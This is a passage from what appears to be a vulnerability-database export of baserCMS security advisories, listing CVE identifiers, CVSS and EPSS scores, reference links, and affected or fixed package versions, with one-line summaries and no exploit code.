scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-0570
reference_id CVE-2018-0570
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-0570
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.16
purl pkg:composer/baserproject/basercms@3.0.16
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-u16w-rbuk-ybfs
30
vulnerability VCID-uedz-j2vn-cbea
31
vulnerability VCID-vqx2-hzju-r7et
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-y2sz-c6vb-pkdp
34
vulnerability VCID-zqd4-rdem-jfgk
35
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.16
1
url pkg:composer/baserproject/basercms@4.1.1
purl pkg:composer/baserproject/basercms@4.1.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-9mf7-56fh-fyfk
9
vulnerability VCID-ays7-6wvh-augt
10
vulnerability VCID-d1sf-cmct-zbh1
11
vulnerability VCID-d5gk-q2hh-kba5
12
vulnerability VCID-eq7f-n3g5-s3hu
13
vulnerability VCID-g56w-z9cx-5ygv
14
vulnerability VCID-ggv8-3v9t-mfea
15
vulnerability VCID-gsg3-fdmu-vqag
16
vulnerability VCID-hpk4-a6tr-3ffe
17
vulnerability VCID-j37y-gws9-ake9
18
vulnerability VCID-jby7-s5ez-dqb3
19
vulnerability VCID-k575-suuf-7bhf
20
vulnerability VCID-k5qv-4yp3-zbgf
21
vulnerability VCID-khft-xvrw-g3dr
22
vulnerability VCID-kmpp-6j49-pqfz
23
vulnerability VCID-mfm9-gsh3-ubg8
24
vulnerability VCID-nxrf-64er-xbfx
25
vulnerability VCID-p695-t9ye-v3ga
26
vulnerability VCID-p6nr-eu91-53b4
27
vulnerability VCID-pd8c-9d7z-zkhg
28
vulnerability VCID-sqr4-v889-tff8
29
vulnerability VCID-twf5-bzba-gqb4
30
vulnerability VCID-u16w-rbuk-ybfs
31
vulnerability VCID-uedz-j2vn-cbea
32
vulnerability VCID-vqx2-hzju-r7et
33
vulnerability VCID-wvnk-63hy-ykeq
34
vulnerability VCID-xpsb-2yux-g3cf
35
vulnerability VCID-xxud-7jsh-bbc1
36
vulnerability VCID-y2sz-c6vb-pkdp
37
vulnerability VCID-zqd4-rdem-jfgk
38
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.1
aliases CVE-2018-0570, GHSA-994g-74gq-5qpr
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ga9u-uv9b-tydr
20
url VCID-ggv8-3v9t-mfea
vulnerability_id VCID-ggv8-3v9t-mfea
summary
baserCMS Cross-site Scripting vulnerability in Site search Feature
There is an XSS vulnerability in the site search feature of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-44379
reference_id
reference_type
scores
0
value 0.00622
scoring_system epss
scoring_elements 0.70549
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-44379
1
reference_url https://basercms.net/security/JVN_73283159
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://basercms.net/security/JVN_73283159
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-44379
reference_id CVE-2023-44379
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-44379
5
reference_url https://github.com/advisories/GHSA-66c2-p8rh-qx87
reference_id GHSA-66c2-p8rh-qx87
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-66c2-p8rh-qx87
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87
reference_id GHSA-66c2-p8rh-qx87
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2023-44379, GHSA-66c2-p8rh-qx87
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ggv8-3v9t-mfea
21
url VCID-gsg3-fdmu-vqag
vulnerability_id VCID-gsg3-fdmu-vqag
summary
Improper Input Validation
baserCMS allows remote attackers to execute arbitrary PHP code via the `admin/theme_configs/form`.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2018-18942
reference_id
reference_type
scores
0
value 0.00928
scoring_system epss
scoring_elements 0.76457
published_at 2026-06-04T12:55:00Z
1
value 0.00928
scoring_system epss
scoring_elements 0.76486
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2018-18942
1
reference_url https://basercms.net/release/4_1_4
reference_id
reference_type
scores
url https://basercms.net/release/4_1_4
2
reference_url https://github.com/baserproject/basercms/issues/959
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/issues/959
3
reference_url https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4
4
reference_url https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS
5
reference_url https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS/
reference_id
reference_type
scores
url https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS/
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2018-18942
reference_id CVE-2018-18942
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2018-18942
7
reference_url https://github.com/advisories/GHSA-rjc2-x53r-6c9r
reference_id GHSA-rjc2-x53r-6c9r
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rjc2-x53r-6c9r
fixed_packages
0
url pkg:composer/baserproject/basercms@4.1.4
purl pkg:composer/baserproject/basercms@4.1.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-3new-f12y-8bf9
2
vulnerability VCID-4zw8-truk-pugf
3
vulnerability VCID-5ay3-1t5g-vycu
4
vulnerability VCID-7x3n-4c2b-nfbx
5
vulnerability VCID-891u-x525-ykbb
6
vulnerability VCID-8buz-nsr9-3yge
7
vulnerability VCID-8ssu-umet-37bk
8
vulnerability VCID-ays7-6wvh-augt
9
vulnerability VCID-d1sf-cmct-zbh1
10
vulnerability VCID-d5gk-q2hh-kba5
11
vulnerability VCID-eq7f-n3g5-s3hu
12
vulnerability VCID-g56w-z9cx-5ygv
13
vulnerability VCID-ggv8-3v9t-mfea
14
vulnerability VCID-hpk4-a6tr-3ffe
15
vulnerability VCID-j37y-gws9-ake9
16
vulnerability VCID-jby7-s5ez-dqb3
17
vulnerability VCID-k575-suuf-7bhf
18
vulnerability VCID-k5qv-4yp3-zbgf
19
vulnerability VCID-khft-xvrw-g3dr
20
vulnerability VCID-kmpp-6j49-pqfz
21
vulnerability VCID-mfm9-gsh3-ubg8
22
vulnerability VCID-nxrf-64er-xbfx
23
vulnerability VCID-p695-t9ye-v3ga
24
vulnerability VCID-p6nr-eu91-53b4
25
vulnerability VCID-pd8c-9d7z-zkhg
26
vulnerability VCID-sqr4-v889-tff8
27
vulnerability VCID-twf5-bzba-gqb4
28
vulnerability VCID-u16w-rbuk-ybfs
29
vulnerability VCID-uedz-j2vn-cbea
30
vulnerability VCID-vqx2-hzju-r7et
31
vulnerability VCID-wvnk-63hy-ykeq
32
vulnerability VCID-xpsb-2yux-g3cf
33
vulnerability VCID-xxud-7jsh-bbc1
34
vulnerability VCID-y2sz-c6vb-pkdp
35
vulnerability VCID-zqd4-rdem-jfgk
36
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.1.4
aliases CVE-2018-18942, GHSA-rjc2-x53r-6c9r
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gsg3-fdmu-vqag
22
url VCID-guvm-x5jc-mfgc
vulnerability_id VCID-guvm-x5jc-mfgc
summary
Path Traversal
baserCMS allows remote attackers to delete arbitrary files via unspecified vectors when the "File" field is being used in the mail form.
references
0
reference_url http://jvn.jp/en/jp/JVN78151490/index.html
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN78151490/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2017-10843
reference_id
reference_type
scores
0
value 0.0057
scoring_system epss
scoring_elements 0.69014
published_at 2026-06-05T12:55:00Z
1
value 0.0057
scoring_system epss
scoring_elements 0.68975
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2017-10843
2
reference_url https://basercms.net/security/JVN78151490
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN78151490
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2017-10843
reference_id CVE-2017-10843
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2017-10843
4
reference_url https://github.com/advisories/GHSA-x73x-7gmx-w835
reference_id GHSA-x73x-7gmx-w835
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-x73x-7gmx-w835
fixed_packages
0
url pkg:composer/baserproject/basercms@3.0.15
purl pkg:composer/baserproject/basercms@3.0.15
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-u16w-rbuk-ybfs
35
vulnerability VCID-uedz-j2vn-cbea
36
vulnerability VCID-vqx2-hzju-r7et
37
vulnerability VCID-xpsb-2yux-g3cf
38
vulnerability VCID-y2sz-c6vb-pkdp
39
vulnerability VCID-yesf-qxgy-3ygx
40
vulnerability VCID-zqd4-rdem-jfgk
41
vulnerability VCID-zsgc-fnen-b7a6
42
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@3.0.15
1
url pkg:composer/baserproject/basercms@4.0.5.1
purl pkg:composer/baserproject/basercms@4.0.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-twf5-bzba-gqb4
35
vulnerability VCID-u16w-rbuk-ybfs
36
vulnerability VCID-uedz-j2vn-cbea
37
vulnerability VCID-vqx2-hzju-r7et
38
vulnerability VCID-wvnk-63hy-ykeq
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-xxud-7jsh-bbc1
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.5.1
2
url pkg:composer/baserproject/basercms@4.0.6
purl pkg:composer/baserproject/basercms@4.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1q79-sxzp-zker
1
vulnerability VCID-2u6y-aj6t-7fb1
2
vulnerability VCID-3new-f12y-8bf9
3
vulnerability VCID-4zw8-truk-pugf
4
vulnerability VCID-5ay3-1t5g-vycu
5
vulnerability VCID-6trr-5deb-yydm
6
vulnerability VCID-7x3n-4c2b-nfbx
7
vulnerability VCID-891u-x525-ykbb
8
vulnerability VCID-8buz-nsr9-3yge
9
vulnerability VCID-8ssu-umet-37bk
10
vulnerability VCID-9mf7-56fh-fyfk
11
vulnerability VCID-ays7-6wvh-augt
12
vulnerability VCID-d1sf-cmct-zbh1
13
vulnerability VCID-d5gk-q2hh-kba5
14
vulnerability VCID-e4xa-jm9u-nked
15
vulnerability VCID-eq7f-n3g5-s3hu
16
vulnerability VCID-g56w-z9cx-5ygv
17
vulnerability VCID-ga9u-uv9b-tydr
18
vulnerability VCID-ggv8-3v9t-mfea
19
vulnerability VCID-gsg3-fdmu-vqag
20
vulnerability VCID-hpk4-a6tr-3ffe
21
vulnerability VCID-j37y-gws9-ake9
22
vulnerability VCID-jby7-s5ez-dqb3
23
vulnerability VCID-k575-suuf-7bhf
24
vulnerability VCID-k5qv-4yp3-zbgf
25
vulnerability VCID-khft-xvrw-g3dr
26
vulnerability VCID-kmpp-6j49-pqfz
27
vulnerability VCID-mfm9-gsh3-ubg8
28
vulnerability VCID-nxrf-64er-xbfx
29
vulnerability VCID-p695-t9ye-v3ga
30
vulnerability VCID-p6nr-eu91-53b4
31
vulnerability VCID-pd8c-9d7z-zkhg
32
vulnerability VCID-r4jc-22rq-d3cb
33
vulnerability VCID-sqr4-v889-tff8
34
vulnerability VCID-twf5-bzba-gqb4
35
vulnerability VCID-u16w-rbuk-ybfs
36
vulnerability VCID-uedz-j2vn-cbea
37
vulnerability VCID-vqx2-hzju-r7et
38
vulnerability VCID-wvnk-63hy-ykeq
39
vulnerability VCID-xpsb-2yux-g3cf
40
vulnerability VCID-xxud-7jsh-bbc1
41
vulnerability VCID-y2sz-c6vb-pkdp
42
vulnerability VCID-yesf-qxgy-3ygx
43
vulnerability VCID-zqd4-rdem-jfgk
44
vulnerability VCID-zsgc-fnen-b7a6
45
vulnerability VCID-zy68-bur9-1fck
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.6
aliases CVE-2017-10843, GHSA-x73x-7gmx-w835
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-guvm-x5jc-mfgc
23
url VCID-hpk4-a6tr-3ffe
vulnerability_id VCID-hpk4-a6tr-3ffe
summary baserCMS is an open source content management system with a focus on Japanese language support. A Cross-site Scripting vulnerability has been identified.
references
0
reference_url http://jvn.jp/en/jp/JVN14134801/index.html
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN14134801/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-39136
reference_id
reference_type
scores
0
value 0.0054
scoring_system epss
scoring_elements 0.67989
published_at 2026-06-05T12:55:00Z
1
value 0.0054
scoring_system epss
scoring_elements 0.6795
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-39136
2
reference_url https://basercms.net/security/JVN_14134801
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_14134801
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-39136
reference_id CVE-2021-39136
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-39136
fixed_packages
0
url pkg:composer/baserproject/basercms@4.5.1
purl pkg:composer/baserproject/basercms@4.5.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-j37y-gws9-ake9
12
vulnerability VCID-jby7-s5ez-dqb3
13
vulnerability VCID-k575-suuf-7bhf
14
vulnerability VCID-k5qv-4yp3-zbgf
15
vulnerability VCID-khft-xvrw-g3dr
16
vulnerability VCID-kmpp-6j49-pqfz
17
vulnerability VCID-mfm9-gsh3-ubg8
18
vulnerability VCID-nxrf-64er-xbfx
19
vulnerability VCID-p695-t9ye-v3ga
20
vulnerability VCID-pd8c-9d7z-zkhg
21
vulnerability VCID-sqr4-v889-tff8
22
vulnerability VCID-u16w-rbuk-ybfs
23
vulnerability VCID-uedz-j2vn-cbea
24
vulnerability VCID-y2sz-c6vb-pkdp
25
vulnerability VCID-zqd4-rdem-jfgk
26
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.1
aliases CVE-2021-39136, GHSA-hgjr-632x-qpp3
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hpk4-a6tr-3ffe
24
url VCID-j37y-gws9-ake9
vulnerability_id VCID-j37y-gws9-ake9
summary
Unrestricted Upload of File with Dangerous Type
baserCMS is a Content Management system. Prior to version 4.7.5, there is a Remote Code Execution (RCE) Vulnerability in the management system of baserCMS. Version 4.7.5 contains a patch.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-25654
reference_id
reference_type
scores
0
value 0.02083
scoring_system epss
scoring_elements 0.84309
published_at 2026-06-04T12:55:00Z
1
value 0.02083
scoring_system epss
scoring_elements 0.84332
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-25654
1
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
2
reference_url https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96
3
reference_url https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359
4
reference_url https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
